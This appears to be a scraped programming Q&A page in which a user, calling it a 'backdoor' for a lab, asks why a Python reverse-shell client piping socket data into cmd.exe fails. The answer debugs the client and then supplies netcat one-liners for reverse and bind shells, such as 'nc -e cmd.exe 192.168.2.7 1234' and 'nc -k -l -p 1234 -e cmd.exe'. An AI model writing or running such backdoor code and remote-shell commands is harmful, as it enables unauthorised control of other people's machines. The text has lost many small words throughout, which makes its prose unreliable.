i have 2 python files communicating socket. when pass data took stdin.write have error 22 invalid argument. code
a="c:\python27\tools" proc = subprocess.popen('cmd.exe', cwd=a ,universal_newlines = true, shell=true, stdout=subprocess.pipe, stderr=subprocess.pipe, stdin=subprocess.pipe) data = s.recv(1024) # s socket created proc.stdin.write(data) ##### error in line output = proc.stdout.readline() print output.rstrip() remainder = proc.communicate()[0] print remainder update ok want create backdoor on system, in localhost inside network lab. educational purpose. have 2 machines. 1) running ubuntu , i have in server code:
import socket,sys s=socket.socket() host = "192.168.2.7" #the servers ip port = 1234 s.bind((host, port)) s.listen(1) #wait client connection. c, addr = s.accept() # establish connection client. print 'got connection from', addr c.send('thank connecting') while true: command_from_user = raw_input("give command: ") #read command user if command_from_user == 'quit': break c.send(command_from_user) #sending command client c.close() # close connection have code client:
import socket import sys import subprocess, os s=socket.socket(socket.af_inet, socket.sock_stream) print 'socket created' host = "192.168.2.7" #ip of server machine port = 1234 s.connect((host,port)) #open tcp connection hostname on port print s.recv(1024) a="c:\python27\tools" proc = subprocess.popen('cmd.exe', cwd=a ,universal_newlines = true, stdout=subprocess.pipe, stderr=subprocess.pipe, stdin=subprocess.pipe) while true: data = s.recv(1024) if (data == "") or (data=="quit"): break proc.stdin.write('%s\n' % data) proc.stdin.flush() remainder = proc.communicate()[0] print remainder stdoutput=proc.stdout.read() + proc.stderr.read() s.close #closing socket and error in client file
traceback (most recent call last): file "ex1client2.py", line 50, in proc.stdin.write('%s\n' % data) valueerror: i/o operation on closed file
basically want run serial commands server client , output in server. first command executed, second command error message. main problem led me solution chanhing directory command. when excecute cd "path" doesn't change.
your new code has different problem, why raises similar different error. let's @ key part:
while true: data = s.recv(1024) if (data == "") or (data=="quit"): break proc.stdin.write('%s\n' % data) proc.stdin.flush() remainder = proc.communicate()[0] print remainder stdoutput=proc.stdout.read() + proc.stderr.read() the problem each time through list, you're calling proc.communicate(). the docs explain, will:
send data stdin. read data stdout , stderr, until end-of-file reached. wait process terminate.
so, after call, child process has quit, , pipes closed. next time through loop, try write input pipe anyway. since pipe has been closed, valueerror: i/o operation on closed file, means says.
if want run each command in separate cmd.exe shell instance, have move proc = subprocess.popen('cmd.exe', …) bit loop.
on other hand, if want send commands 1 one same shell, can't call communicate; have write stdin, read stdout , stderr until know they're done, , leave open next time through loop.
the downside of first 1 pretty obvious: if cd \users\me\documents in first command, dir in second command, , they're running in different shells, you're going end getting directory listing of c:\python27\tools rather c:\users\me\documents.
but downside of second 1 pretty obvious too: need write code somehow either knows when each command done (maybe because prompt again?), or can block on proc.stdout, proc.stderr, , s @ same time. (and without accidentally deadlocking pipes.) , can't toss them select, because pipes aren't sockets. so, real option create reader thread stdout , 1 stderr, or 1 of async subprocess libraries off pypi, or use twisted or framework has own way of doing async subprocess pipes.
if @ source communicate, can see how threading should work.
meanwhile, side note, code has serious problem. you're expecting each s.recv(1024) going return 1 command. that's not how tcp sockets work. you'll first 2-1/2 commands in 1 recv, , 1/4th of command in next one, , on.
on localhost, or home lan, when you're sending few small messages around, work 99% of time, still have deal 1% or code mysteriously break sometimes. , on internet, , many real lans, work 10% of time.
so, have implement kind of protocol delimits messages in way.
fortunately, simple cases, python gives easy solution this: makefile. when commands delimited newlines, , can block synchronously until you've got complete command, trivial. instead of this:
while true: data = s.recv(1024) … this:
f = s.makefile() while true: data = f.readline() you need remember close both f , s later (or s right after makefile, , f later). more idiomatic use is:
with s.makefile() f: s.close() data in f: one last thing:
ok want create backdoor on system, in localhost inside network lab
"localhost" means same machine you're running one, "a localhost inside network lab" doesn't make sense. assume meant "host" here, in case whole thing makes sense.
if don't need use python, can whole thing one-liner using netcat. there few different versions different syntax. believe ubuntu comes gnu netcat built-in; if not, it's installable apt-get netcat or apt-get nc. windows doesn't come anything, can ports of variant.
a quick google "netcat remote shell" turned bunch of blog posts, forum messages, , videos showing how this, such using netcat spawn remote shell, you're better off googling netcat tutorials instead.
the more usual design have "backdoor" machine (your windows box) listen on port, , other machine (your ubuntu) connect it, that's of blog posts/etc. show you. advantage of direction "backyard server" listens forever—you can connect up, stuff, quit, connect again later, etc. without having go windows box , start new connection.
but other way around, backyard client on windows box, easy. on ubuntu box, start server connects terminal first connection comes in:
nc -l -p 1234 then on windows box, make connection server, , connect cmd.exe. assuming you've installed gnu-syntax variant:
nc -e cmd.exe 192.168.2.7 1234 that's it. lot simpler writing in python.
for more typical design, backdoor server on windows runs this:
nc -k -l -p 1234 -e cmd.exe and connect ubuntu with:
nc windows.machine.address 1234 or can add -t backdoor server, , connect telnet instead of nc.
Comments
Post a Comment